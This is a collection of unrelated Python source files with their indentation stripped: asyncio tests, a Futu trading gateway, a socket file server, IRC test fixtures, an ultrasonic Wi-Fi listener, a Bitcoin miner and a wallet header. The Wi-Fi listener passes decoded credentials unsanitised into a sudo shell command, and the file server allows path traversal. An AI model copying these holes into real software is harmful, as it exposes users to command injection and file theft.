def test_streamreader_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that StreamReaderProtocol constructor
# retrieves the current loop if the loop parameter is not set
reader = asyncio.StreamReader()
self.assertIs(reader._loop, self.loop)
def test_streamreaderprotocol_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that StreamReaderProtocol constructor
# retrieves the current loop if the loop parameter is not set
reader = mock.Mock()
protocol = asyncio.StreamReaderProtocol(reader)
self.assertIs(protocol._loop, self.loop)
def test_drain_raises(self):
# See http://bugs.python.org/issue25441
# This test should not use asyncio for the mock server; the
# whole point of the test is to test for a bug in drain()
# where it never gives up the event loop but the socket is
# closed on the server side.
q = queue.Queue()
def server():
# Runs in a separate thread.
sock = socket.socket()
with sock:
sock.bind(('localhost', 0))
sock.listen(1)
addr = sock.getsockname()
q.put(addr)
clt, _ = sock.accept()
clt.close()
@asyncio.coroutine
def client(host, port):
reader, writer = yield from asyncio.open_connection(host, port, loop=self.loop)
while True:
writer.write(b"foo\n")
yield from writer.drain()
# Start the server thread and wait for it to be listening.
thread = threading.Thread(target=server)
thread.setDaemon(True)
thread.start()
addr = q.get()
# Should not be stuck in an infinite loop.
with self.assertRaises((ConnectionResetError, BrokenPipeError)):
self.loop.run_until_complete(client(*addr))
# Clean up the thread. (Only on success; on failure, it may
# be stuck in accept().)
thread.join()
def test___repr__(self):
stream = asyncio.StreamReader(loop=self.loop)
self.assertEqual("<StreamReader>", repr(stream))
def test___repr__nondefault_limit(self):
stream = asyncio.StreamReader(loop=self.loop, limit=123)
self.assertEqual("<StreamReader l=123>", repr(stream))
def test___repr__eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_eof()
self.assertEqual("<StreamReader eof>", repr(stream))
def test___repr__data(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'data')
self.assertEqual("<StreamReader 4 bytes>", repr(stream))
def test___repr__exception(self):
stream = asyncio.StreamReader(loop=self.loop)
exc = RuntimeError()
stream.set_exception(exc)
self.assertEqual("<StreamReader e=RuntimeError()>", repr(stream))
def test___repr__waiter(self):
stream = asyncio.StreamReader(loop=self.loop)
stream._waiter = asyncio.Future(loop=self.loop)
self.assertRegex(
repr(stream),
"<StreamReader w=<Future pending[\S ]*>>")
stream._waiter.set_result(None)
self.loop.run_until_complete(stream._waiter)
stream._waiter = None
self.assertEqual("<StreamReader>", repr(stream))
def test___repr__transport(self):
stream = asyncio.StreamReader(loop=self.loop)
stream._transport = mock.Mock()
stream._transport.__repr__ = mock.Mock()
stream._transport.__repr__.return_value = "<Transport>"
self.assertEqual("<StreamReader t=<Transport>>", repr(stream))
if __name__ == '__main__':
unittest.main()
|
futu_gateway.py
|
"""
Please install futu-api before use.
"""
from copy import copy
from datetime import datetime
from threading import Thread
from time import sleep
import pytz
from futu import (
ModifyOrderOp,
TrdSide,
TrdEnv,
OpenHKTradeContext,
OpenQuoteContext,
OpenUSTradeContext,
OrderBookHandlerBase,
OrderStatus,
OrderType,
RET_ERROR,
RET_OK,
StockQuoteHandlerBase,
TradeDealHandlerBase,
TradeOrderHandlerBase
)
from vnpy.trader.constant import Direction, Exchange, Product, Status
from vnpy.trader.event import EVENT_TIMER
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
OrderData,
TradeData,
AccountData,
ContractData,
PositionData,
SubscribeRequest,
OrderRequest,
CancelRequest
)
EXCHANGE_VT2FUTU = {
Exchange.SMART: "US",
Exchange.SEHK: "HK",
Exchange.HKFE: "HK_FUTURE",
}
EXCHANGE_FUTU2VT = {v: k for k, v in EXCHANGE_VT2FUTU.items()}
PRODUCT_VT2FUTU = {
Product.EQUITY: "STOCK",
Product.INDEX: "IDX",
Product.ETF: "ETF",
Product.WARRANT: "WARRANT",
Product.BOND: "BOND",
}
DIRECTION_VT2FUTU = {
Direction.LONG: TrdSide.BUY,
Direction.SHORT: TrdSide.SELL,
}
DIRECTION_FUTU2VT = {v: k for k, v in DIRECTION_VT2FUTU.items()}
STATUS_FUTU2VT = {
OrderStatus.NONE: Status.SUBMITTING,
OrderStatus.SUBMITTING: Status.SUBMITTING,
OrderStatus.SUBMITTED: Status.NOTTRADED,
OrderStatus.FILLED_PART: Status.PARTTRADED,
OrderStatus.FILLED_ALL: Status.ALLTRADED,
OrderStatus.CANCELLED_ALL: Status.CANCELLED,
OrderStatus.CANCELLED_PART: Status.CANCELLED,
OrderStatus.SUBMIT_FAILED: Status.REJECTED,
OrderStatus.FAILED: Status.REJECTED,
OrderStatus.DISABLED: Status.CANCELLED,
}
CHINA_TZ = pytz.timezone("Asia/Shanghai")
class FutuGateway(BaseGateway):
""""""
default_setting = {
"密码": "",
"地址": "127.0.0.1",
"端口": 11111,
"市场": ["HK", "US"],
"环境": [TrdEnv.REAL, TrdEnv.SIMULATE],
}
exchanges = list(EXCHANGE_FUTU2VT.values())
def __init__(self, event_engine):
"""Constructor"""
super(FutuGateway, self).__init__(event_engine, "FUTU")
self.quote_ctx = None
self.trade_ctx = None
self.host = ""
self.port = 0
self.market = ""
self.password = ""
self.env = TrdEnv.SIMULATE
self.ticks = {}
self.trades = set()
self.contracts = {}
self.thread = Thread(target=self.query_data)
# For query function.
self.count = 0
self.interval = 1
self.query_funcs = [self.query_account, self.query_position]
def connect(self, setting: dict):
""""""
self.host = setting["地址"]
self.port = setting["端口"]
self.market = setting["市场"]
self.password = setting["密码"]
self.env = setting["环境"]
self.connect_quote()
self.connect_trade()
self.thread.start()
def query_data(self):
"""
Query all data necessary.
"""
sleep(2.0) # Wait 2 seconds till connection completed.
self.query_contract()
self.query_trade()
self.query_order()
self.query_position()
self.query_account()
# Start fixed interval query.
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
def process_timer_event(self, event):
""""""
self.count += 1
if self.count < self.interval:
return
self.count = 0
func = self.query_funcs.pop(0)
func()
self.query_funcs.append(func)
def connect_quote(self):
"""
Connect to market data server.
"""
self.quote_ctx = OpenQuoteContext(self.host, self.port)
class QuoteHandler(StockQuoteHandlerBase):
gateway = self
def on_recv_rsp(self, rsp_str):
ret_code, content = super(QuoteHandler, self).on_recv_rsp(
rsp_str
)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.process_quote(content)
return RET_OK, content
class OrderBookHandler(OrderBookHandlerBase):
gateway = self
def on_recv_rsp(self, rsp_str):
ret_code, content = super(OrderBookHandler, self).on_recv_rsp(
rsp_str
)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.process_orderbook(content)
return RET_OK, content
self.quote_ctx.set_handler(QuoteHandler())
self.quote_ctx.set_handler(OrderBookHandler())
self.quote_ctx.start()
self.write_log("行情接口连接成功")
def connect_trade(self):
"""
Connect to trade server.
"""
# Initialize context according to market.
if self.market == "US":
self.trade_ctx = OpenUSTradeContext(self.host, self.port)
else:
self.trade_ctx = OpenHKTradeContext(self.host, self.port)
# Implement handlers.
class OrderHandler(TradeOrderHandlerBase):
gateway = self
def on_recv_rsp(self, rsp_str):
ret_code, content = super(OrderHandler, self).on_recv_rsp(
rsp_str
)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.process_order(content)
return RET_OK, content
class DealHandler(TradeDealHandlerBase):
gateway = self
def on_recv_rsp(self, rsp_str):
ret_code, content = super(DealHandler, self).on_recv_rsp(
rsp_str
)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.process_deal(content)
return RET_OK, content
# Unlock to allow trading.
code, data = self.trade_ctx.unlock_trade(self.password)
if code == RET_OK:
self.write_log("交易接口解锁成功")
else:
self.write_log(f"交易接口解锁失败,原因:{data}")
# Start context.
self.trade_ctx.set_handler(OrderHandler())
self.trade_ctx.set_handler(DealHandler())
self.trade_ctx.start()
self.write_log("交易接口连接成功")
def subscribe(self, req: SubscribeRequest):
""""""
for data_type in ["QUOTE", "ORDER_BOOK"]:
futu_symbol = convert_symbol_vt2futu(req.symbol, req.exchange)
code, data = self.quote_ctx.subscribe(futu_symbol, data_type, True)
if code:
self.write_log(f"订阅行情失败:{data}")
def send_order(self, req: OrderRequest):
""""""
side = DIRECTION_VT2FUTU[req.direction]
futu_order_type = OrderType.NORMAL # Only limit order is supported.
# Set price adjustment mode to inside adjustment.
if req.direction is Direction.LONG:
adjust_limit = 0.05
else:
adjust_limit = -0.05
futu_symbol = convert_symbol_vt2futu(req.symbol, req.exchange)
code, data = self.trade_ctx.place_order(
req.price,
req.volume,
futu_symbol,
side,
futu_order_type,
trd_env=self.env,
adjust_limit=adjust_limit,
)
if code:
self.write_log(f"委托失败:{data}")
return ""
for ix, row in data.iterrows():
orderid = str(row["order_id"])
order = req.create_order_data(orderid, self.gateway_name)
self.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
""""""
code, data = self.trade_ctx.modify_order(
ModifyOrderOp.CANCEL, req.orderid, 0, 0, trd_env=self.env
)
if code:
self.write_log(f"撤单失败:{data}")
def query_contract(self):
""""""
for product, futu_product in PRODUCT_VT2FUTU.items():
code, data = self.quote_ctx.get_stock_basicinfo(
self.market, futu_product
)
if code:
self.write_log(f"查询合约信息失败:{data}")
return
for ix, row in data.iterrows():
symbol, exchange = convert_symbol_futu2vt(row["code"])
contract = ContractData(
symbol=symbol,
exchange=exchange,
name=row["name"],
product=product,
size=1,
pricetick=0.001,
net_position=True,
gateway_name=self.gateway_name,
)
self.on_contract(contract)
self.contracts[contract.vt_symbol] = contract
self.write_log("合约信息查询成功")
def query_account(self):
""""""
code, data = self.trade_ctx.accinfo_query(trd_env=self.env, acc_id=0)
if code:
self.write_log(f"查询账户资金失败:{data}")
return
for ix, row in data.iterrows():
account = AccountData(
accountid=f"{self.gateway_name}_{self.market}",
balance=float(row["total_assets"]),
frozen=(float(row["total_assets"]) -
float(row["avl_withdrawal_cash"])),
gateway_name=self.gateway_name,
)
self.on_account(account)
def query_position(self):
""""""
code, data = self.trade_ctx.position_list_query(
trd_env=self.env, acc_id=0
)
if code:
self.write_log(f"查询持仓失败:{data}")
return
for ix, row in data.iterrows():
symbol, exchange = convert_symbol_futu2vt(row["code"])
pos = PositionData(
symbol=symbol,
exchange=exchange,
direction=Direction.LONG,
volume=row["qty"],
frozen=(float(row["qty"]) - float(row["can_sell_qty"])),
price=float(row["cost_price"]),
pnl=float(row["pl_val"]),
gateway_name=self.gateway_name,
)
self.on_position(pos)
def query_order(self):
""""""
code, data = self.trade_ctx.order_list_query("", trd_env=self.env)
if code:
self.write_log(f"查询委托失败:{data}")
return
self.process_order(data)
self.write_log("委托查询成功")
def query_trade(self):
""""""
code, data = self.trade_ctx.deal_list_query("", trd_env=self.env)
if code:
self.write_log(f"查询成交失败:{data}")
return
self.process_deal(data)
self.write_log("成交查询成功")
def close(self):
""""""
if self.quote_ctx:
self.quote_ctx.close()
if self.trade_ctx:
self.trade_ctx.close()
def get_tick(self, code):
"""
Get tick buffer.
"""
tick = self.ticks.get(code, None)
symbol, exchange = convert_symbol_futu2vt(code)
if not tick:
tick = TickData(
symbol=symbol,
exchange=exchange,
datetime=datetime.now(CHINA_TZ),
gateway_name=self.gateway_name,
)
self.ticks[code] = tick
contract = self.contracts.get(tick.vt_symbol, None)
if contract:
tick.name = contract.name
return tick
def process_quote(self, data):
"""报价推送"""
for ix, row in data.iterrows():
symbol = row["code"]
date = row["data_date"].replace("-", "")
time = row["data_time"]
dt = datetime.strptime(f"{date} {time}", "%Y%m%d %H:%M:%S")
dt = CHINA_TZ.localize(dt)
tick = self.get_tick(symbol)
tick.datetime = dt
tick.open_price = row["open_price"]
tick.high_price = row["high_price"]
tick.low_price = row["low_price"]
tick.pre_close = row["prev_close_price"]
tick.last_price = row["last_price"]
tick.volume = row["volume"]
if "price_spread" in row:
spread = row["price_spread"]
tick.limit_up = tick.last_price + spread * 10
tick.limit_down = tick.last_price - spread * 10
self.on_tick(copy(tick))
def process_orderbook(self, data):
""""""
symbol = data["code"]
tick = self.get_tick(symbol)
d = tick.__dict__
for i in range(5):
bid_data = data["Bid"][i]
ask_data = data["Ask"][i]
n = i + 1
d["bid_price_%s" % n] = bid_data[0]
d["bid_volume_%s" % n] = bid_data[1]
d["ask_price_%s" % n] = ask_data[0]
d["ask_volume_%s" % n] = ask_data[1]
if tick.datetime:
self.on_tick(copy(tick))
def process_order(self, data):
"""
Process order data for both query and update.
"""
for ix, row in data.iterrows():
# Ignore order with status DELETED
if row["order_status"] == OrderStatus.DELETED:
continue
symbol, exchange = convert_symbol_futu2vt(row["code"])
order = OrderData(
symbol=symbol,
exchange=exchange,
orderid=str(row["order_id"]),
direction=DIRECTION_FUTU2VT[row["trd_side"]],
price=float(row["price"]),
volume=row["qty"],
traded=row["dealt_qty"],
status=STATUS_FUTU2VT[row["order_status"]],
datetime=generate_datetime(row["create_time"]),
gateway_name=self.gateway_name,
)
self.on_order(order)
def process_deal(self, data):
"""
Process trade data for both query and update.
"""
for ix, row in data.iterrows():
tradeid = str(row["deal_id"])
if tradeid in self.trades:
continue
self.trades.add(tradeid)
symbol, exchange = convert_symbol_futu2vt(row["code"])
trade = TradeData(
symbol=symbol,
exchange=exchange,
direction=DIRECTION_FUTU2VT[row["trd_side"]],
tradeid=tradeid,
orderid=row["order_id"],
price=float(row["price"]),
volume=row["qty"],
datetime=generate_datetime(row["create_time"]),
gateway_name=self.gateway_name,
)
self.on_trade(trade)
def convert_symbol_futu2vt(code):
"""
Convert symbol from futu to vt.
"""
code_list = code.split(".")
futu_exchange = code_list[0]
futu_symbol = ".".join(code_list[1:])
exchange = EXCHANGE_FUTU2VT[futu_exchange]
return futu_symbol, exchange
def convert_symbol_vt2futu(symbol, exchange):
"""
Convert symbol from vt to futu.
"""
futu_exchange = EXCHANGE_VT2FUTU[exchange]
return f"{futu_exchange}.{symbol}"
def generate_datetime(s: str) -> datetime:
if "." in s:
dt = datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")
else:
dt = datetime.strptime(s, "%Y-%m-%d %H:%M:%S")
dt = CHINA_TZ.localize(dt)
return dt
|
notice_client.py
|
# -*- coding: utf-8 -*-
import time
import random
import threading
from gevent.queue import JoinableQueue
from inner_lib.func_ext import get_md5, http_request
from inner_lib.func_ext import message_format
from conf.config import MAXSIZE
class NoticeClient(object):
init_flag = False
_instance = None
_instance_lock = threading.Lock()
def __new__(cls, *args, **kwargs):
# 双重检查锁定创建单例
if not cls._instance:
with cls._instance_lock:
if not cls._instance:
cls._instance = super().__new__(cls)
return cls._instance
else:
return cls._instance
def __init__(self, app_key, app_secret, api_url):
if not self.init_flag: # 防止重复执行init方法
self.api_url = api_url
self.app_key = app_key
self.app_secret = app_secret
self.req_q = JoinableQueue(MAXSIZE)
self.init_flag = True
t1 = threading.Thread(target=http_request, args=[self.api_url, self.req_q])
t1.start()
else:
return
def sys_params(self, body):
"""构造请求参数参数"""
time.sleep(1)
now = int(time.time())
auth_key = '%d-%s-%s' % (now, self.app_secret, self.app_key)
auth_key_md5 = get_md5(auth_key)
auth_str = auth_key_md5[0:4] + str(random.randint(100, 999)) + auth_key_md5[4:24] + str(
random.randint(10000, 99999)) + auth_key_md5[24:]
_params = {
"key": self.app_key,
"auth_str": auth_str,
"timestamp": now,
"req_msg": body,
}
return _params
def send(self, data, to_users):
to_users = "|".join(to_users)
data = message_format(data)
body = {
"to_user": to_users,
"content": data
}
_params = self.sys_params(body)
self.req_q.put(_params)
return True
|
server.py
|
from shell import PRIMITIVE
import socket
import threading
import os
from utils import Utils
lock = threading.Lock()
class Server(object):
def __init__(self):
server_ip = "192.168.220.131"
server_port = 60000
self.server = socket.socket()
self.server.bind((server_ip, server_port))
self.server.listen()
self.threading_pool = []
def handler(self, conn: socket.socket, index: int):
Utils.send_message(conn, "Welcome to Deadpool and his star File Sharing Server! Enjoy yourself")
while True:
try:
op_type = Utils.recv_message(conn)
args = (Utils.recv_message(conn)).split(" ")
# content_size = struct.unpack('i', conn.recv(4))[0]
current_thread = threading.currentThread()
lock.acquire()
print("current thread id: %d" % current_thread.ident)
print("request from client %s: operation %s, args %s" % (conn.getpeername(), op_type, args))
lock.release()
if op_type == PRIMITIVE.SEND_FILE.name:
lock.acquire()
Utils.recv_file("server_mock_data_base", conn)
lock.release()
Utils.send_message(conn, PRIMITIVE.SEND_INFO.name)
Utils.send_message(conn, "upload successfully!")
elif op_type == PRIMITIVE.RECV_FILE.name:
path = os.path.join("server_mock_data_base", args[0])
if os.path.isfile(path):
Utils.send_message(conn, PRIMITIVE.SEND_FILE.name)
Utils.send_file(conn, path)
else:
Utils.send_message(conn, PRIMITIVE.SEND_INFO.name)
Utils.send_message(conn, path + " not found!")
elif op_type == PRIMITIVE.CHEK_LIST.name:
path = os.path.abspath("server_mock_data_base")
directory = os.listdir(path)
print(directory)
Utils.send_message(conn, PRIMITIVE.CHEK_LIST.name)
Utils.send_message(conn, " ".join(directory))
else:
info = Utils.recv_message(conn)
print(info)
Utils.send_message(conn, PRIMITIVE.SEND_INFO.name)
Utils.send_message(conn, "send "+info + " successfully!")
if info == "bye":
break
except socket.error as e:
print(e)
break
# self.threading_pool[index].join()
self.threading_pool.remove(threading.currentThread())
return
def start_server(self):
while True:
conn, addr = self.server.accept()
thread = threading.Thread(target=self.handler, args=(conn, len(self.threading_pool),), daemon=True)
self.threading_pool.append(thread)
thread.start()
def shut_down_server(self):
self.server.close()
return
if __name__ == "__main__":
server = Server()
server.start_server()
|
conftest.py
|
import pytest
import threading
import traceback
import socket
from server import ConnectionListener
# fmt: off
motd_dict_test = {
"motd": [
"- Hello {user_nick}, this is a test MOTD!",
"-",
"- Foo",
"- Bar",
"- Baz",
"-",
"- End test MOTD"
]
}
# fmt: on
# Based on: https://gist.github.com/sbrugman/59b3535ebcd5aa0e2598293cfa58b6ab#gistcomment-3795790
@pytest.fixture
def fail_test_if_there_is_an_error_in_a_thread(monkeypatch):
last_exception = None
class ThreadWrapper(threading.Thread):
def run(self):
try:
super().run()
except Exception as e:
traceback.print_exc()
nonlocal last_exception
last_exception = e
monkeypatch.setattr(threading, "Thread", ThreadWrapper)
yield
if last_exception:
raise last_exception
@pytest.fixture
def run_server(fail_test_if_there_is_an_error_in_a_thread):
listener = ConnectionListener(6667, motd_dict_test)
def run_server():
try:
listener.run_server_forever()
except OSError:
return
threading.Thread(target=run_server).start()
yield
# .shutdown() raises an OSError on mac, removing it makes the test suite freeze on linux.
try:
listener.listener_socket.shutdown(socket.SHUT_RDWR)
except OSError:
pass
listener.listener_socket.close()
@pytest.fixture
def user_alice(run_server, helpers):
alice_socket = socket.socket()
alice_socket.connect(("localhost", 6667))
alice_socket.sendall(b"NICK Alice\r\n")
alice_socket.sendall(b"USER AliceUsr 0 * :Alice's real name\r\n")
# Receiving everything the server is going to send helps prevent errors.
# Otherwise it might not be fully started yet when the client quits.
while helpers.receive_line(alice_socket) != b":mantatail 376 Alice :End of /MOTD command\r\n":
pass
yield alice_socket
alice_socket.sendall(b"QUIT\r\n")
while b"QUIT" not in helpers.receive_line(alice_socket):
pass
alice_socket.close()
@pytest.fixture
def user_bob(run_server, helpers):
bob_socket = socket.socket()
bob_socket.connect(("localhost", 6667))
bob_socket.sendall(b"NICK Bob\r\n")
bob_socket.sendall(b"USER BobUsr 0 * :Bob's real name\r\n")
# Receiving everything the server is going to send helps prevent errors.
# Otherwise it might not be fully started yet when the client quits.
while helpers.receive_line(bob_socket) != b":mantatail 376 Bob :End of /MOTD command\r\n":
pass
yield bob_socket
bob_socket.sendall(b"QUIT\r\n")
while b"QUIT" not in helpers.receive_line(bob_socket):
pass
bob_socket.close()
@pytest.fixture
def user_charlie(run_server, helpers):
charlie_socket = socket.socket()
charlie_socket.connect(("localhost", 6667))
charlie_socket.sendall(b"NICK Charlie\r\n")
charlie_socket.sendall(b"USER CharlieUsr 0 * :Charlie's real name\r\n")
# Receiving everything the server is going to send helps prevent errors.
# Otherwise it might not be fully started yet when the client quits.
while helpers.receive_line(charlie_socket) != b":mantatail 376 Charlie :End of /MOTD command\r\n":
pass
yield charlie_socket
charlie_socket.sendall(b"QUIT\r\n")
while b"QUIT" not in helpers.receive_line(charlie_socket):
pass
charlie_socket.close()
# Based on https://stackoverflow.com/a/42156088/15382873
class Helpers:
@staticmethod
def receive_line(sock, timeout=1):
sock.settimeout(timeout)
received = b""
while not received.endswith(b"\r\n"):
received += sock.recv(1)
return received
# Makes it easier to assert bytes received from Sets
@staticmethod
def compare_if_word_match_in_any_order(received_bytes, compare_with):
return set(received_bytes.split()) == set(compare_with.split())
@pytest.fixture
def helpers():
return Helpers
|
listener.py
|
import os
import sys
if sys.version_info[0] < 3:
import Queue as queue
else:
import queue
import threading
import signal
import numpy
import pyaudio
from quiet.quiet import Decoder
class Listener(object):
def __init__(self):
self.pyaudio_instance = None
self.done = None
self.thread = None
def start(self):
self.done = False
if not (self.thread and self.thread.is_alive()):
self.thread = threading.Thread(target=self.run)
self.thread.start()
def run(self):
FORMAT = pyaudio.paFloat32
CHANNELS = 1
RATE = 44100
CHUNK = int(RATE / 10)
if not self.pyaudio_instance:
self.pyaudio_instance = pyaudio.PyAudio()
q = queue.Queue()
def callback(in_data, frame_count, time_info, status):
q.put(in_data)
return (None, pyaudio.paContinue)
stream = self.pyaudio_instance.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK,
stream_callback=callback)
decoder = Decoder(profile_name='ultrasonic-experimental')
while not self.done:
audio = q.get()
audio = numpy.fromstring(audio, dtype='float32')
data = decoder.decode(audio)
if data is not None:
self.on_data(data)
stream.stop_stream()
def stop(self):
self.done = True
if self.thread and self.thread.is_alive():
self.thread.join()
def on_data(self, data):
print(data)
def main():
listener = Listener()
def on_data(data):
ssid_length = data[0]
ssid = data[1:ssid_length+1].tostring().decode('utf-8')
password = data[ssid_length+1:].tostring().decode('utf-8')
print('SSID: {}\nPassword: {}'.format(ssid, password))
if os.system('which nmcli >/dev/null') == 0:
cmd = 'sudo nmcli device wifi connect {} password {}'.format(ssid, password)
if os.system(cmd) == 0:
print('Wi-Fi is connected')
listener.stop()
else:
print('Failed')
else:
print('to do')
def int_handler(sig, frame):
listener.stop()
signal.signal(signal.SIGINT, int_handler)
listener.on_data = on_data
listener.run()
if __name__ == '__main__':
main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '111.90.140.12'
if 'port' not in settings:
settings['port'] = 46261
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
wallet.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - ImportedAddressWallet: imported address, no keystore
# - ImportedPrivkeyWallet: imported private keys, keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import copy
import errno
import json
import os
import queue
import random
import time
import threading
from collections import defaultdict
from functools import partial
from .i18n import ngettext
from .util import NotEnoughFunds, ExcessiveFee, PrintError, UserCancelled, profiler, format_satoshis, format_time, finalization_print_error, to_string
from .address import Address, Script, ScriptOutput, PublicKey, OpCodes
from .bitcoin import *
from .version import *
from .keystore import load_keystore, Hardware_KeyStore, Imported_KeyStore, BIP32_KeyStore, xpubkey_to_address
from . import networks
from . import keystore
